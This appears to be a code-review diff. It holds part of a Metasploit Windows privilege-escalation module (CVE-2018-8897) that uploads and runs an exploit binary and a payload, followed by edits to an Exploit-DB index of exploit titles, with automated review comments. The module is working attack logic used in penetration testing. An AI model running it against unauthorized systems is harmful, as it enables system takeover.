@exploit_path = "#{temp_path}\\#{exploit_name}"
@payload_exe = generate_payload_exe
end
def validate_active_host
begin
host = session.session_host
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
end
end
def validate_remote_path(path)
unless directory?(path)
fail_with(Failure::Unreachable, "#{path} does not exist on the target")
end
end
def validate_target
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
if sysinfo['OS'] =~ /XP/
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def ensure_clean_destination(path)
if file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin
file_rm(path)
print_status("Deleted #{path}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error("Unable to delete #{path}")
end
end
end
def ensure_clean_exploit_destination
ensure_clean_destination(exploit_path)
end
def ensure_clean_payload_destination
ensure_clean_destination(payload_path)
end
def upload_exploit
local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')
upload_file(exploit_path, local_exploit_path)
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
end
def upload_payload
write_file(payload_path, payload_exe)
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
end
def execute_exploit
sleep(datastore['EXECUTE_DELAY'])
print_status("Running exploit #{exploit_path} with payload #{payload_path}")
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
vprint_status(output)
end
def exploit
begin
validate_active_host
validate_target
validate_remote_path(temp_path)
ensure_clean_exploit_destination
ensure_clean_payload_destination
upload_exploit
upload_payload
execute_exploit
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error(e.message)
ensure_clean_exploit_destination
ensure_clean_payload_destination
end
end
attr_reader :exploit_name
attr_reader :payload_name
attr_reader :payload_exe
attr_reader :temp_path
attr_reader :payload_path
attr_reader :exploit_path
end
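Review bot: `upload_exploit` ships a prebuilt `cve-2018-8897-exe.exe` out of `Msf::Config.data_directory`, but nothing in the module records which source tree or commit that binary was built from, or its hash, so a reviewer cannot tie it to the referenced `https://github.com/can1357/CVE-2018-8897/` PoC; a comment giving the build provenance (source path, commit, hash) would make the shipped binary verifiable. Minor: `host = session.session_host` in `validate_active_host` is assigned but never read, and the surrounding `rescue Rex::Post::Meterpreter::RequestError` only matters for the `sysinfo` call, not for `session_host`.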


@ -6016,6 +6016,7 @@ id,file,description,date,author,type,platform,port
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
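Review bot: the new 45017 title spells the technology "Activex"; the conventional spelling is "ActiveX", and since these titles are what searches match against, the usual casing is worth keeping.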
@ -9812,6 +9813,7 @@ id,file,description,date,author,type,platform,port
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16608,11 +16610,15 @@ id,file,description,date,author,type,platform,port
44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181
45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
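Review bot: dropping "Unauthenticated" from the 44992 and 45005 titles matches the convention visible in this hunk of only flagging the authenticated case (45020 phpMyAdmin "(Authenticated) Remote Code Execution"), but the newly added 45025 entry keeps "Unauthenticated Command Execution" in its title, so the convention is not applied uniformly within the same hunk; either rename 45025 the same way or leave the other two as they were.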
@ -26049,7 +26055,7 @@ id,file,description,date,author,type,platform,port
18468,exploits/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",webapps,php,
18470,exploits/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,webapps,php,
18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple,
18480,exploits/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
18480,exploits/php/webapps/18480.txt,"Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
18483,exploits/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",webapps,php,
18499,exploits/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",webapps,hardware,
18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,
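Review bot: the renamed 18480 title keeps the version expression "3.2.0 < Alpha", which reads as a typo; the other Dolibarr entries touched in this diff use either "< 3.2.0" (18725) or "3.2 Alpha" (36873), so this one probably wants "< 3.2.0 Alpha" or "3.2.0 Alpha" to be checked against the advisory before the rename lands.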
@ -26149,7 +26155,7 @@ id,file,description,date,author,type,platform,port
18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,
18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",webapps,cgi,
18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - (Authenticated) OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php,
18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
18732,exploits/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",webapps,php,
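Review bot: the new 18725 title "< 3.2.0 / < 3.1.1" gives two overlapping upper bounds, since anything below 3.1.1 is also below 3.2.0; if the intent is that fixes shipped in both the 3.2 and 3.1 branches, stating the fixed versions (e.g. "< 3.2.0 / 3.1.x < 3.1.1") would say that unambiguously.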
@ -30956,7 +30962,7 @@ id,file,description,date,author,type,platform,port
28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php,
28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,webapps,php,
28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - (Authenticated) Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80
28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",webapps,unix,
28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios,
28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios,
@ -34015,7 +34021,7 @@ id,file,description,date,author,type,platform,port
34004,exploits/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34005,exploits/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34006,exploits/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34007,exploits/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
34007,exploits/php/webapps/34007.txt,"Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
34008,exploits/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
34011,exploits/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",webapps,php,
34012,exploits/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,webapps,php,
@ -35052,7 +35058,7 @@ id,file,description,date,author,type,platform,port
35648,exploits/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",webapps,php,
35649,exploits/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35650,exploits/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",webapps,php,
35651,exploits/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35651,exploits/php/webapps/35651.txt,"Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
35657,exploits/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,webapps,php,
35655,exploits/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",webapps,php,
35662,exploits/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",webapps,php,
@ -35476,9 +35482,9 @@ id,file,description,date,author,type,platform,port
36328,exploits/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,webapps,php,
36329,exploits/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,webapps,php,
36330,exploits/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",webapps,php,
36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
36338,exploits/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
36339,exploits/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
36340,exploits/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
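Review bot: 36331, 36332 and 36333 are renamed to "Dolibarr ERP/CRM 3.1.0", but the unchanged 36330 context line from the same author and date still reads "Dolibarr ERP/CRM 3.1"; if these four advisories cover the same release, 36330 should be renamed in the same pass for consistency.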
@ -35715,7 +35721,7 @@ id,file,description,date,author,type,platform,port
36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80
36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80
36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
36683,exploits/php/webapps/36683.txt,"Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java,
36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php,
36686,exploits/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",webapps,php,
@ -35831,7 +35837,7 @@ id,file,description,date,author,type,platform,port
36865,exploits/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,webapps,hardware,
36867,exploits/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,webapps,php,
36870,exploits/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",webapps,php,
36873,exploits/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
36873,exploits/php/webapps/36873.txt,"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,
36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,
36876,exploits/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,webapps,php,
@ -39554,7 +39560,7 @@ id,file,description,date,author,type,platform,port
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
44805,exploits/php/webapps/44805.txt,"Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection",2018-05-30,Sysdream,webapps,php,80
44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware,
44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
@ -39634,12 +39640,13 @@ id,file,description,date,author,type,platform,port
44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
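Review bot: the new 45014 row is inserted between 44978 and 44981, which breaks the ascending id order the rest of this section follows (45015, 45016 and 45022 are appended at the end of the section in the following hunk); moving 45014 next to them keeps the file sorted. The port added to 44975 (8181) agrees with the 45018 Metasploit entry for the same product, which looks right.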
@ -39650,3 +39657,6 @@ id,file,description,date,author,type,platform,port
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
